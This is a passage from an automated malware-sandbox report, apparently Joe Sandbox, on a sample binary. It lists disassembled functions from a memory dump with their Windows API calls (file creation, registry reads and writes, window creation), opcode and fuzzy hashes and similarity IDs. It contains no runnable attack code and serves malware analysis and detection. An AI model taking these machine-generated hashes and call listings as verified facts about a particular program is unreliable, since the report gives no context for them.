                                                                                                                                  • Opcode Fuzzy Hash: 163dec2600431a030be702771b8272ad05ba025b4c35e06113b1fcdc30f4644b
                                                                                                                                  • Instruction Fuzzy Hash: 6C41A434B00709AFFB11EBA1D981B9EB7F9AF04308F108469E844A3692DB74BF059B44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,041F9DE8,?,?,041F5B68,00000001), ref: 041F9CFC
                                                                                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,041F9DE8,?,?,041F5B68,00000001), ref: 041F9D2A
                                                                                                                                    • Part of subcall function 041E8CE0: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,041F5B68,041F9D6A,00000000,041F9DE8,?,?,041F5B68), ref: 041E8D2E
                                                                                                                                    • Part of subcall function 041E8F1C: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,041F5B68,041F9D85,00000000,041F9DE8,?,?,041F5B68,00000001), ref: 041E8F3B
                                                                                                                                  • GetLastError.KERNEL32(00000000,041F9DE8,?,?,041F5B68,00000001), ref: 041F9D8F
                                                                                                                                    • Part of subcall function 041EB878: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,041ED5E5,00000000,041ED63F), ref: 041EB897
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 503785936-0
                                                                                                                                  • Opcode ID: dac0f085123dcd30f51330ea3151b60fe5e00ab8207a6b9aa187794634467657
                                                                                                                                  • Instruction ID: 45c2d83d03abcd3aeb8c173277c96d69b6f3f3b8da75ba7b13ae76cf29ad45a3
                                                                                                                                  • Opcode Fuzzy Hash: dac0f085123dcd30f51330ea3151b60fe5e00ab8207a6b9aa187794634467657
                                                                                                                                  • Instruction Fuzzy Hash: FF316574A04A589FEB00EFA6CCC0BEEB7F5AF49708F508165E504A7380D7797D058BA5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,0436ED0C), ref: 0423C7CC
                                                                                                                                  • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,0423C837), ref: 0423C804
                                                                                                                                  • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,0423C837), ref: 0423C80F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 779948276-0
                                                                                                                                  • Opcode ID: 59484884f62abd892dcd320ce58ae65409c94375061bbfe4f8085bdc8756a1c4
                                                                                                                                  • Instruction ID: 990807a7d412d2a63731b29ef12e49f5a398e05c6624959ee491eba58bfbc8a5
                                                                                                                                  • Opcode Fuzzy Hash: 59484884f62abd892dcd320ce58ae65409c94375061bbfe4f8085bdc8756a1c4
                                                                                                                                  • Instruction Fuzzy Hash: 69110D79600608AFEB00EFAADDC19AD7BFCEB48744F508561F404D7250D774FE019A54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  • Opcode ID: 68ada7704a887b4c6d6d930544c97257d3ced3f770cdb821634e2eaacacd14b0
                                                                                                                                  • Instruction ID: 9cf27b660b68643df5f08500bb1cff5ba40df4f76798c1c50968b7aaa95d2124
                                                                                                                                  • Opcode Fuzzy Hash: 68ada7704a887b4c6d6d930544c97257d3ced3f770cdb821634e2eaacacd14b0
                                                                                                                                  • Instruction Fuzzy Hash: F5F0C26CF00A10B6B7156B3B9DC45BA23999F04608B9144B5EC469B211DB35FC4BD362
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysFreeString.OLEAUT32(0423C89C), ref: 041E4F76
                                                                                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 041E5063
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 041E5075
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 986138563-0
                                                                                                                                  • Opcode ID: df0ebbd49c3a427229fcfe081cf9a0000e2a8653e023cf59d4f9583f6407e03e
                                                                                                                                  • Instruction ID: 1fc93f8af5d3672bb5fbf24d6030ab28ddeeec79faf02fa8fa2419cb62b6571c
                                                                                                                                  • Opcode Fuzzy Hash: df0ebbd49c3a427229fcfe081cf9a0000e2a8653e023cf59d4f9583f6407e03e
                                                                                                                                  • Instruction Fuzzy Hash: 93E012BC505A026DFF156F6B8CC0F3B336DAFC5A00FA544D8A400DA165DB38F491A624
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 041FF5A6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString
                                                                                                                                  • String ID: H
                                                                                                                                  • API String ID: 3341692771-2852464175
                                                                                                                                  • Opcode ID: f05e8a5f2ac49b25a62a6eb3482c3f99b3f7aa1f0e4a6a23aa40a97fc0a47d7a
                                                                                                                                  • Instruction ID: 84e8ec5c965006cc14f5d562a7659c3f0b8f03ffda345aeef83ce75f5a1e1d93
                                                                                                                                  • Opcode Fuzzy Hash: f05e8a5f2ac49b25a62a6eb3482c3f99b3f7aa1f0e4a6a23aa40a97fc0a47d7a
                                                                                                                                  • Instruction Fuzzy Hash: 18B1C274A01608DFDB14CF99D8C0AADBBF2FF89314F1581AAE905AB360D770A846CF54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,04200524), ref: 042004F2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue
                                                                                                                                  • String ID: MS Shell Dlg 2
                                                                                                                                  • API String ID: 3660427363-3198668166
                                                                                                                                  • Opcode ID: db5121f2734763979ec4ff47aa658ec7e1099c7c02836b1da46307653a404667
                                                                                                                                  • Instruction ID: 3ba12ffaeb62d92bed498ea567da6ff83c4b9046a3877d9412bf5054592154b7
                                                                                                                                  • Opcode Fuzzy Hash: db5121f2734763979ec4ff47aa658ec7e1099c7c02836b1da46307653a404667
                                                                                                                                  • Instruction Fuzzy Hash: F3F0826630D2446FE704EAADAD80BABBBDC9B85210F05807AF948C7182DA20DC098365
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,04200524), ref: 042004F2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue
                                                                                                                                  • String ID: MS Shell Dlg 2
                                                                                                                                  • API String ID: 3660427363-3198668166
                                                                                                                                  • Opcode ID: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
                                                                                                                                  • Instruction ID: 7ab645b865326406f1945e5f5608b0b5570c3d0476a0b54eb451a1e357040366
                                                                                                                                  • Opcode Fuzzy Hash: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
                                                                                                                                  • Instruction Fuzzy Hash: 67F030663091086BE704EAAEAD80FABBBDCDB85254F01813AB94CC7241DB21EC098361
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 041EFAED
                                                                                                                                    • Part of subcall function 041EF6D0: VariantClear.OLEAUT32(?), ref: 041EF6DF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearCopy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 274517740-0
                                                                                                                                  • Opcode ID: f7b702742b67ac1df389bac58dfbf21f518ba920ec5cb98617a9702feb02167b
                                                                                                                                  • Instruction ID: 2b8f91cd30e6841b596f0907515b8e2c6472d0813e637f09496d7c0258212967
                                                                                                                                  • Opcode Fuzzy Hash: f7b702742b67ac1df389bac58dfbf21f518ba920ec5cb98617a9702feb02167b
                                                                                                                                  • Instruction Fuzzy Hash: 0911E928700B10A7EB24AF2BC8D097733D9DF852507198566EC4A8F295DB71FC43D755
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1927566239-0
                                                                                                                                  • Opcode ID: 668ea34762dabdde4b8075589c8741bfcb37180c4d36a43421f8ab8e7ecd3318
                                                                                                                                  • Instruction ID: de89ed66f78219c0ab651129e339d50845c81471aa9de73f80641ddbf21e2260
                                                                                                                                  • Opcode Fuzzy Hash: 668ea34762dabdde4b8075589c8741bfcb37180c4d36a43421f8ab8e7ecd3318
                                                                                                                                  • Instruction Fuzzy Hash: 5C313C79B00A08BBEB14DFAAD8C49BA77E8EB09314F4545A6FD05D2250E734BA42CB51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,042004A2), ref: 04200374
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                  • Opcode ID: 328fe1633653f21328180393a7bddf9ba66f920ab9726a89f8b37d75f01a7810
                                                                                                                                  • Instruction ID: b215e9cd46b0e87aa4c586e1e0ba9ffc7cb63b635c198085f6f51b05f05af212
                                                                                                                                  • Opcode Fuzzy Hash: 328fe1633653f21328180393a7bddf9ba66f920ab9726a89f8b37d75f01a7810
                                                                                                                                  • Instruction Fuzzy Hash: 5621A734B00608AFF711DBA5D991BAEB7F9EB45304F108475A804D3292DB74AF04A644
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 042005DB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3660427363-0
                                                                                                                                  • Opcode ID: 7c9883ff9e2ea468f80ebf2f3a0718c6c053e2b99d8ed138ddcf65da09c81582
                                                                                                                                  • Instruction ID: dfa6d971ce05fa4f0614930b1df2a34e6500d6dbdc3dddceb2523eae776aa8ea
                                                                                                                                  • Opcode Fuzzy Hash: 7c9883ff9e2ea468f80ebf2f3a0718c6c053e2b99d8ed138ddcf65da09c81582
                                                                                                                                  • Instruction Fuzzy Hash: 1C012176700208AFE700DEA9DD80AAAB7ECDB59214F008166BD18D7241DB31AE0487A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 042005DB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3660427363-0
                                                                                                                                  • Opcode ID: d6ba614917a2cc45bb5a74c5311f750dd9150f68595f6d1eb89ab066daf75888
                                                                                                                                  • Instruction ID: 016e313df51518dc757a38636ce3a9493bff039e50e04ee3dd0744d7008af405
                                                                                                                                  • Opcode Fuzzy Hash: d6ba614917a2cc45bb5a74c5311f750dd9150f68595f6d1eb89ab066daf75888
                                                                                                                                  • Instruction Fuzzy Hash: E7014476700208AFE700DEA9DDC0E9FB7ECDB59214F008166FD18D7241DB31AE0487A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 041E73CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
                                                                                                                                  • Instruction ID: e6a1c9d5ffdaad37c80b261bd790cc5841984ded08f9d2efba8dc1844eb54d39
                                                                                                                                  • Opcode Fuzzy Hash: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
                                                                                                                                  • Instruction Fuzzy Hash: 21F092B6700118BFAB80DE9DDC80EEB77ECEB4C264B054165FA0CD3200D630ED118BA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 041E73CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
                                                                                                                                  • Instruction ID: f8005f3d4569ebf2c758afcdea609e5d54265da8a8d97aa916e5b81133bd57fd
                                                                                                                                  • Opcode Fuzzy Hash: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
                                                                                                                                  • Instruction Fuzzy Hash: 91F092B6600118BFAB80DE9DDC80EDB77ECEB4C264B054165FA0CD3200D630ED118BA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • CLSIDFromProgID.OLE32(00000000,?,00000000,041FEF85,?,?,?,00000000), ref: 041FEF65
                                                                                                                                    • Part of subcall function 041E4F68: SysFreeString.OLEAUT32(0423C89C), ref: 041E4F76
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeFromProgString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4225568880-0
                                                                                                                                  • Opcode ID: e5b4ed3a49ce8e0c88b1fcf75f83c1f0efa3d4832aed28174c7a933b7283d8f1
                                                                                                                                  • Instruction ID: 1c7b0ed395f77a7084aab2eab17a9f88bd12fc2ff297b62aaff4f13c507259dc
                                                                                                                                  • Opcode Fuzzy Hash: e5b4ed3a49ce8e0c88b1fcf75f83c1f0efa3d4832aed28174c7a933b7283d8f1
                                                                                                                                  • Instruction Fuzzy Hash: CEE0E534604B047FE700EBA2CC81969769CDB89608BA204B1F50093510DB717E0084A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameA.KERNEL32(041E0000,?,00000105), ref: 041E5B96
                                                                                                                                    • Part of subcall function 041E5DDC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,041E0000,0424A794), ref: 041E5DF8
                                                                                                                                    • Part of subcall function 041E5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,041E0000,0424A794), ref: 041E5E16
                                                                                                                                    • Part of subcall function 041E5DDC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,041E0000,0424A794), ref: 041E5E34
                                                                                                                                    • Part of subcall function 041E5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 041E5E52
                                                                                                                                    • Part of subcall function 041E5DDC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,041E5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 041E5E9B
                                                                                                                                    • Part of subcall function 041E5DDC: RegQueryValueExA.ADVAPI32(?,041E6048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,041E5EE1,?,80000001), ref: 041E5EB9
                                                                                                                                    • Part of subcall function 041E5DDC: RegCloseKey.ADVAPI32(?,041E5EE8,00000000,?,?,00000000,041E5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 041E5EDB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2796650324-0
                                                                                                                                  • Opcode ID: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
                                                                                                                                  • Instruction ID: ae8836f8600b14b8b4ccb663ed08b8babca9cc9452d133f60bbe661e49d0ae77
                                                                                                                                  • Opcode Fuzzy Hash: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
                                                                                                                                  • Instruction Fuzzy Hash: 10E06D75A01614EFDF50DE98C9C0A9633D9AB08658F000691ED58CF346D3B0EA108BD4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 041E8D78
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
